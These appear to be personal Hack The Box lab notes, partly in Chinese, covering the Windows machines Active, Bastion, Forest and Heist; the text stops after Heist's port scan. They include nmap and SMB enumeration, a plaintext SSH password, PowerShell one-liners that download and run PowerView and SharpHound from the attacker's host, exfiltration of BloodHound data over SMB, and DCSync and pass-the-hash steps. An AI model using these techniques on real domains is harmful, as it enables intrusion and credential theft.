Nmap scan report for 10.10.10.100 Host is up (0.59s latency). Not shown: 982 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-04 09:21:59Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Service 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
========================== | Target Information | ========================== Target ........... 10.10.10.100 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
------
====================================== | OS information on 10.10.10.100 | ====================================== Use of uninitialized value $global_workgroupin concatenation (.) or string at ./enum4linux.pl line 458. Use of uninitialized value $os_infoin concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 10.10.10.100 from smbclient: Use of uninitialized value $global_workgroupin concatenation (.) or string at ./enum4linux.pl line 467. [+] Got OS info for 10.10.10.100 from srvinfo: 10.10.10.100 Wk Sv PDC Tim NT Domain Controller platform_id : 500 os version : 6.1 server type : 0x80102b
------
========================================= | Share Enumeration on 10.10.10.100 | ========================================= Use of uninitialized value $global_workgroupin concatenation (.) or string at ./enum4linux.pl line 640.
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin attacker_folder Disk C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Replication Disk SYSVOL Disk Logon server share Users Disk
应该可以匿名登录
1 2 3 4 5 6 7 8 9 10 11 12
smbmap -H 10.10.10.100
Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin attacker_folder NO ACCESS C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC NETLOGON NO ACCESS Logon server share Replication READ ONLY SYSVOL NO ACCESS Logon server share Users NO ACCESS
下载整个文件夹
1 2 3 4 5
smbclient //10.10.10.100/Replication mask "" recurse ON prompt OFF mget active.htb
type \users\administrator\desktop\root.txt b5fc76d1d6b91d77b2fbf2d54d0f708b
Bastion
端口扫描
1 2 3 4 5 6 7 8 9 10 11
nmap -sV -sT -Pn 10.10.10.134
Nmap scan report for 10.10.10.134 Host is up (0.59s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
漏洞利用
smbmap扫描路径
1 2 3 4 5 6 7
smbmap -H 10.10.10.134 -u test Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin Backups READ, WRITE C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC
dir WindowsImageBackup\L4mpje-PC\"Backup 2019-02-22 124351"\ . Dn 0 Fri Feb 22 20:45:32 2019 .. Dn 0 Fri Feb 22 20:45:32 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 20:44:03 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 20:45:32 2019 BackupSpecs.xml An 1186 Fri Feb 22 20:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 20:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 20:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 20:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 20:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 20:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 20:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 20:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 20:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 20:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 20:45:32 2019 7735807 blocks of size 4096. 2757267 blocks available
ssh administrator@10.10.10.134 thXLHM96BeKL0ER2 type \Users\Administrator\Desktop\root.txt
958850b91811676ed6620a9c430e65c8
Forest
端口扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
nmap -sV -sT -Pn 10.10.10.161
Nmap scan report for 10.10.10.161 Host is up (0.081s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-05 14:34:46Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
=========================================== | Getting domain SID for 10.10.10.161 | =========================================== Domain Name: HTB Domain Sid: S-1-5-21-3072663084-364016917-1341370565 [+] Host is part of a domain (not a workgroup)
Typically that requires credentials on the domain to authenticate with. There is an option for an account to have the property “Do not require Kerberos preauthentication” or UF_DONT_REQUIRE_PREAUTH set to true. AS-REP Roasting is an attack against Kerberos for these accounts.
iex(new-object net.webclient).downloadstring("http://10.10.16.11:9998/PowerView.ps1") iex(new-object net.webclient).downloadstring("http://10.10.16.11:9998/SharpHound.ps1") powershell -exec bypass invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice net use \\10.10.16.11\Bufferfly /u:Buffer fly copy 20210705223815_BloodHound.zip \\10.10.16.11\Bufferfly\ net use /d \\10.10.16.11\Bufferfly
bloodhound的内容实在是看不懂,看了WP
大概思路是
用户"svc-alfresco"拥有账户操作权限,可以创建域账户
用户"svc-alfresco"完全控制"Exchange Windows Permissions"组(GenericAll),可以将"svc-alfresco"加入"Exchange Windows Permissions"组
"Exchange Windows Permissions"组可以修改域用户的ACL(WriteDacl)
用户"svc-alfresco"利用"Exchange Windows Permissions"组的权限赋予"DCSync"权限
利用这个域账户进行DCSync攻击
添加域用户
1
net user bufferfly bufferfly /add /domain
执行命令后重新Getshell
1
Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members svc-alfresco
查看组
1 2 3 4
whoami /groups
HTB\Exchange Windows Permissions Group S-1-5-21-3072663084-364016917-1341370565-1121 Mandatory group, Enabled by default, Enabled group HTB\Exchange Trusted Subsystem Group S-1-5-21-3072663084-364016917-1341370565-1119 Mandatory group, Enabled by default, Enabled grou
evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6 type c:\users\administrator\desktop\root.txt
f048153f202bbb2f82622b04d79129cc
貌似svc-alfresco不是域用户,而DCSync的操作需要一个域用户的凭证
Powershell在运行命令时貌似会自动地从ps1文件载入函数,很方便
Heist
端口扫描
1 2 3 4 5 6 7 8 9 10
nmap -sV -sT -Pn 10.10.10.149
Nmap scan report for 10.10.10.149 Host is up (0.24s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows